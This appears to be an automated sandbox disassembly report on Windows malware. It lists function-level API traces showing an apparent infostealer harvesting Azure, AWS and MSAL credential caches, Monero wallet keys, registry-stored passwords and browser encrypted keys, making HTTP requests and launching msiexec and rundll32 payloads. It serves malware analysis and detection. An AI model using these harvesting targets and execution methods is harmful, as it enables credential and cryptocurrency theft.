                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D949E2
                                  • Part of subcall function 00D94910: PathMatchSpecA.SHLWAPI(?,?), ref: 00D94A1E
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,0182EAB8), ref: 00D94A4A
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,00DA0FF8), ref: 00D94A5C
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,?), ref: 00D94A70
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,00DA0FFC), ref: 00D94A82
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,?), ref: 00D94A96
                                  • Part of subcall function 00D94910: CopyFileA.KERNEL32(?,?,00000001), ref: 00D94AAC
                                  • Part of subcall function 00D94910: DeleteFileA.KERNEL32(?), ref: 00D94B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: ee1832e5b8a9c8d117f9cb1fc123244812e31f242010d35a79f5abf9c2602c65
                                • Instruction ID: 7923ac68d34ef1b1ee998452b461c374ae07e00d91d63f7f697310f06cde0201
                                • Opcode Fuzzy Hash: ee1832e5b8a9c8d117f9cb1fc123244812e31f242010d35a79f5abf9c2602c65
                                • Instruction Fuzzy Hash: 394173BE9502186BDB10F760EC47FED7638AB65704F004494B645A60C2EEB46BCD8BB2
                                Function 00D99010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D9906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 7f39fe26547323a55374b2d07773c980cac8cdf0a915db56ba7c2ce9ead539ac
                                • Instruction ID: 48079d00dc7f329720b3e75ae2df9654db29b2d3413a329a956e8bfd38f0e37e
                                • Opcode Fuzzy Hash: 7f39fe26547323a55374b2d07773c980cac8cdf0a915db56ba7c2ce9ead539ac
                                • Instruction Fuzzy Hash: 8E71B6B5A1020CABDB04EBE4DD99FEEB7B9FF48704F108508F615A7290DB34A905DB61
                                Function 00D92E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D931C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D9335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D934EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: ccfc5633a3e997968cb97f5da800aee359712528095651efe75b0e7902bfbc57
                                • Instruction ID: 71343bf4e2d6d1e1fbbfd0a3a7423df15d3693e8e64538fe119a131828c995cb
                                • Opcode Fuzzy Hash: ccfc5633a3e997968cb97f5da800aee359712528095651efe75b0e7902bfbc57
                                • Instruction Fuzzy Hash: 2E12EA72810118AADF19EBA4DD92FEEB778EF14300F504159F50666192EF346B4ACFB2
                                Function 00D952C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D86280: InternetOpenA.WININET(00DA0DFE,00000001,00000000,00000000,00000000), ref: 00D862E1
                                  • Part of subcall function 00D86280: StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86303
                                  • Part of subcall function 00D86280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D86335
                                  • Part of subcall function 00D86280: HttpOpenRequestA.WININET(00000000,GET,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D86385
                                  • Part of subcall function 00D86280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D863BF
                                  • Part of subcall function 00D86280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D863D1
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95318
                                • lstrlen.KERNEL32(00000000), ref: 00D9532F
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00D95364
                                • lstrlen.KERNEL32(00000000), ref: 00D95383
                                • lstrlen.KERNEL32(00000000), ref: 00D953AE
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 3257e729362bcc09f0bf0d279ee6342fcab0fc47b5247288c845f9352134fbff
                                • Instruction ID: ab6f42ad454759c9818138b00bda0b2604d7856348c0c7f0893aeec003024fd8
                                • Opcode Fuzzy Hash: 3257e729362bcc09f0bf0d279ee6342fcab0fc47b5247288c845f9352134fbff
                                • Instruction Fuzzy Hash: D851FB359201589BDF14FF68D996AED7779EF10300F504128F40A6B592EF34AB4ACBB2
                                Function 00D912D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 128b54afcf273bf84556cd76a8ad4839d472919ecb6888c4f554b77d58ded1dc
                                • Instruction ID: 2180a96f8a7dcf7bd13bf15c8704ddde6c7014af7655ab3f168c53189177ff40
                                • Opcode Fuzzy Hash: 128b54afcf273bf84556cd76a8ad4839d472919ecb6888c4f554b77d58ded1dc
                                • Instruction Fuzzy Hash: ACC193B690021D9BCF14EF60DD8AFEA7378FB54304F004599E50AA7281DA74EA85DFB1
                                Function 00D94280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D942EC
                                • lstrcat.KERNEL32(?,0182E150), ref: 00D9430B
                                • lstrcat.KERNEL32(?,?), ref: 00D9431F
                                • lstrcat.KERNEL32(?,0182D068), ref: 00D94333
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D98D90: GetFileAttributesA.KERNEL32(00000000,?,00D81B54,?,?,00DA564C,?,?,00DA0E1F), ref: 00D98D9F
                                  • Part of subcall function 00D89CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D89D39
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D993C0: GlobalAlloc.KERNEL32(00000000,00D943DD,00D943DD), ref: 00D993D3
                                • StrStrA.SHLWAPI(?,0182E1F8), ref: 00D943F3
                                • GlobalFree.KERNEL32(?), ref: 00D94512
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89AEF
                                  • Part of subcall function 00D89AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D84EEE,00000000,?), ref: 00D89B01
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89B2A
                                  • Part of subcall function 00D89AC0: LocalFree.KERNEL32(?,?,?,?,00D84EEE,00000000,?), ref: 00D89B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00D944A3
                                • StrCmpCA.SHLWAPI(?,00DA08D1), ref: 00D944C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D944D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00D944E5
                                • lstrcat.KERNEL32(00000000,00DA0FB8), ref: 00D944F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: 24d62747f1035ddba5acbddb5c070713824d3b30b3d2240af240df725290cd6e
                                • Instruction ID: 862bc27c1e0ff6ee17cb2befe8237b99e96603dbf19c97624700683b67b36217
                                • Opcode Fuzzy Hash: 24d62747f1035ddba5acbddb5c070713824d3b30b3d2240af240df725290cd6e
                                • Instruction Fuzzy Hash: 037152B6900208ABCF14FBA4DC96FEE7379AB48304F044598F60597181EA35EB49DFB1
                                Function 00D81310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D812B4
                                  • Part of subcall function 00D812A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D812BB
                                  • Part of subcall function 00D812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D812D7
                                  • Part of subcall function 00D812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D812F5
                                  • Part of subcall function 00D812A0: RegCloseKey.ADVAPI32(?), ref: 00D812FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8134F
                                • lstrlen.KERNEL32(?), ref: 00D8135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00D81377
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D81465
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00D814EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 58756c96be4e220bf963ca69a7cf783a671e2f8246c32bc2324de7e413064fd6
                                • Instruction ID: e534b559216225f319dc196a9da0f77e78b38b273306555ff6d51ad1338928b8
                                • Opcode Fuzzy Hash: 58756c96be4e220bf963ca69a7cf783a671e2f8246c32bc2324de7e413064fd6
                                • Instruction Fuzzy Hash: 9B5123B29501199BCB15FB64DD92FED737CEF54300F404598B60AA2091EE706B89CFB6
                                Function 00D875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D8733A
                                  • Part of subcall function 00D872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D873B1
                                  • Part of subcall function 00D872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D8740D
                                  • Part of subcall function 00D872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00D87452
                                  • Part of subcall function 00D872D0: HeapFree.KERNEL32(00000000), ref: 00D87459
                                • lstrcat.KERNEL32(00000000,00DA17FC), ref: 00D87606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D87648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00D8765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D8768F
                                • lstrcat.KERNEL32(00000000,00DA1804), ref: 00D876A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D876D3
                                • lstrcat.KERNEL32(00000000,00DA1808), ref: 00D876ED
                                • task.LIBCPMTD ref: 00D876FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: e97e23e1ff637df88ad13ebd4f315a5517095ed556988c04622970704afb3b28
                                • Instruction ID: c21b3e53558195e15155ba56975fc64cb246e3e7b8b4ecf0301a1613a9c72296
                                • Opcode Fuzzy Hash: e97e23e1ff637df88ad13ebd4f315a5517095ed556988c04622970704afb3b28
                                • Instruction Fuzzy Hash: 1131277690020DEFCB44FBB4DD9ADEE7779EB44305B244118F102A7290DA34A946EBB2
                                Function 00D98100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0182E090,00000000,?,00DA0E2C,00000000,?,00000000), ref: 00D98130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D98137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D98158
                                • __aulldiv.LIBCMT ref: 00D98172
                                • __aulldiv.LIBCMT ref: 00D98180
                                • wsprintfA.USER32 ref: 00D981AC
                                Strings
